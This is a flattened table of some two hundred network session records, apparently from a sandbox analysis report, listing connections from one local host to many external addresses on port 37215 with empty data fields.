                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22574192.168.2.154399641.55.197.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22575192.168.2.153970041.198.218.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22576192.168.2.155156241.85.235.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22577192.168.2.155541041.31.50.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22578192.168.2.155821841.2.90.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22579192.168.2.154450241.142.193.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22580192.168.2.153292041.120.229.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22581192.168.2.154250441.186.22.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22582192.168.2.154369241.192.251.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22583192.168.2.154834641.8.206.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22584192.168.2.155203841.181.167.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22585192.168.2.153942841.162.186.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22586192.168.2.155911641.220.157.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22587192.168.2.153342641.165.82.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22588192.168.2.153292041.199.23.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22589192.168.2.153670241.34.110.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22590192.168.2.155344241.247.215.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22591192.168.2.153963841.99.101.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22592192.168.2.1548328156.145.110.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22593192.168.2.1533222156.137.29.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22594192.168.2.1532970156.240.224.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22595192.168.2.1537404156.68.41.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22596192.168.2.1538684156.26.206.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22597192.168.2.1549378156.243.245.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22598192.168.2.1558820156.185.110.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22599192.168.2.1546150156.93.236.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22600192.168.2.1553990156.40.218.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22601192.168.2.1547736156.255.148.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22602192.168.2.1558886156.106.80.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22603192.168.2.1545484156.126.165.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22604192.168.2.1559756156.30.143.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22605192.168.2.1541560156.39.139.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22606192.168.2.1553760156.169.102.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22607192.168.2.1544054156.86.10.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22608192.168.2.1545262156.135.154.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22609192.168.2.1542816156.50.245.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22610192.168.2.1533292156.232.247.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22611192.168.2.1545544156.43.109.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22612192.168.2.1540584156.153.187.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22613192.168.2.1554318156.3.234.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22614192.168.2.1552754156.138.24.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22615192.168.2.1548762156.111.50.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22616192.168.2.1536618156.72.232.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22617192.168.2.1534154156.197.193.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22618192.168.2.1545592156.98.44.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22619192.168.2.1548816156.96.207.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22620192.168.2.1540836156.62.112.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22621192.168.2.1560848156.43.143.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22622192.168.2.1540230156.180.118.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22623192.168.2.1550380156.104.232.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22624192.168.2.1557464156.199.36.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22625192.168.2.1559300156.41.35.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22626192.168.2.1554862156.253.209.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22627192.168.2.1537696156.189.21.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22628192.168.2.1558776156.215.152.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22629192.168.2.1541460156.101.1.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22630192.168.2.1539012156.248.181.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22631192.168.2.1553742156.192.186.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22632192.168.2.1553678156.135.28.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22633192.168.2.1537012156.148.167.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22634192.168.2.1554960156.222.71.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22635192.168.2.1559986156.132.239.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22636192.168.2.1548396156.171.248.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22637192.168.2.1549098156.113.207.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22638192.168.2.1544014156.73.12.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22639192.168.2.1546294156.205.6.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22640192.168.2.1560306156.92.176.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22641192.168.2.1541636156.169.192.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22642192.168.2.1549622156.167.121.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22643192.168.2.1548380156.6.253.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22644192.168.2.1535836156.80.101.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22645192.168.2.1549662156.179.182.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22646192.168.2.1542472156.193.151.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22647192.168.2.1534440156.253.62.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22648192.168.2.1560944156.15.104.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22649192.168.2.1557028156.245.248.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22650192.168.2.1544082156.217.29.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22651192.168.2.1535494156.226.139.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22652192.168.2.1559950156.159.196.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22653192.168.2.1546404156.35.116.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22654192.168.2.1538904156.33.41.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22655192.168.2.1535182156.161.240.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22656192.168.2.1550070156.73.107.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22657192.168.2.1536634156.98.180.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22658192.168.2.1552932156.178.98.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22659192.168.2.1552168156.130.236.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22660192.168.2.1552684156.114.137.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22661192.168.2.1547776156.130.147.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22662192.168.2.1543250156.172.115.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22663192.168.2.1542764156.111.191.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22664192.168.2.1540452156.239.128.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22665192.168.2.1534204156.54.194.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22666192.168.2.1552128156.120.195.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22667192.168.2.1543316156.106.161.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22668192.168.2.1534932156.138.22.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22669192.168.2.1548666156.141.8.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22670192.168.2.1556968156.54.37.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22671192.168.2.1551520156.5.215.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22672192.168.2.1560186156.140.160.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22673192.168.2.1555842156.175.89.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22674192.168.2.1534592156.76.93.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22675192.168.2.1553934156.70.159.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22676192.168.2.1552686156.116.208.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22677192.168.2.1547436156.95.98.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22678192.168.2.1545400156.35.222.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22679192.168.2.1542224156.166.75.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22680192.168.2.1541098156.86.29.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22681192.168.2.1548250156.113.196.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22682192.168.2.1555580156.120.228.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22683192.168.2.1534706156.25.182.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22684192.168.2.1550798156.229.224.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22685192.168.2.1560448156.36.95.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22686192.168.2.1557930156.97.57.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22687192.168.2.1532922156.252.54.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22688192.168.2.1545184156.20.243.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22689192.168.2.1543126156.64.32.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22690192.168.2.1553356156.49.117.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22691192.168.2.1543452156.65.55.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22692192.168.2.1540444156.236.100.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22693192.168.2.1541408156.35.125.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22694192.168.2.1555966156.35.226.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22695192.168.2.1557216156.4.182.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22696192.168.2.1538280156.214.111.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22697192.168.2.1557666156.123.61.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22698192.168.2.1542354156.177.190.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22699192.168.2.1556832156.87.112.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22700192.168.2.1540222156.169.236.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22701192.168.2.1545272156.30.222.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22702192.168.2.1550828156.49.25.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22703192.168.2.1544024156.88.204.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22704192.168.2.1545672156.22.87.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22705192.168.2.1537354156.220.226.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22706192.168.2.1560562156.167.121.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22707192.168.2.1541234156.30.163.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22708192.168.2.1544560156.194.255.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22709192.168.2.1553234156.3.227.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22710192.168.2.1538666156.57.171.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22711192.168.2.1533664156.255.204.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22712192.168.2.1541708156.108.53.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22713192.168.2.1553324156.189.50.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22714192.168.2.1547386156.182.218.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22715192.168.2.1535366156.195.199.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22716192.168.2.1550792156.237.137.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22717192.168.2.1553716156.191.194.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22718192.168.2.1558306156.104.117.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22719192.168.2.1540018156.139.62.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22720192.168.2.1551676156.251.194.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22721192.168.2.1552122156.244.32.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22722192.168.2.1560506156.63.167.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22723192.168.2.1535156156.102.44.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22724192.168.2.1543402156.46.236.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22725192.168.2.1552612156.199.241.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22726192.168.2.1533316156.185.112.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22727192.168.2.1554922156.50.147.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22728192.168.2.1557762156.105.146.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22729192.168.2.1542802156.211.79.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22730192.168.2.1547508156.5.244.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22731192.168.2.1549838156.75.30.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22732192.168.2.1540962156.171.249.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22733192.168.2.1538140156.190.25.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22734192.168.2.1555412156.132.13.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22735192.168.2.1560480156.176.219.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22736192.168.2.1541784156.209.217.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22737192.168.2.1547014156.220.242.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22738192.168.2.1539184156.227.38.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22739192.168.2.1550802156.146.126.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22740192.168.2.1541118156.240.27.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22741192.168.2.1556784156.88.95.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22742192.168.2.1535920156.150.118.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22743192.168.2.1536532156.118.218.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22744192.168.2.1542776156.78.33.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22745192.168.2.1550484156.97.43.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22746192.168.2.1550414156.254.112.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22747192.168.2.1548306156.88.52.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22748192.168.2.1536530156.158.114.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22749192.168.2.1556206156.74.108.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22750192.168.2.1556030156.215.120.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22751192.168.2.1544144156.135.123.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22752192.168.2.1560360156.2.249.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22753192.168.2.1535692156.156.237.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22754192.168.2.1548518156.181.88.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22755192.168.2.1559178156.162.207.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22756192.168.2.1557260156.33.112.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22757192.168.2.1539518156.11.111.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22758192.168.2.1557310156.5.198.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22759192.168.2.1555836156.6.85.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22760192.168.2.1547372156.187.168.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22761192.168.2.1542806156.106.172.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22762192.168.2.1552100156.137.86.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22763192.168.2.1537036156.80.74.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22764192.168.2.1534576156.231.166.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22765192.168.2.1550048156.7.113.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22766192.168.2.1555672156.50.61.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22767192.168.2.1542240156.211.136.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22768192.168.2.1539578156.98.252.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22769192.168.2.1556914156.15.98.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22770192.168.2.1550030156.116.181.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22771192.168.2.1544566156.48.128.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22772192.168.2.1545794156.149.199.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22773192.168.2.1536690156.48.12.21937215
                                                                            TimestampBytes transferredDirectionData


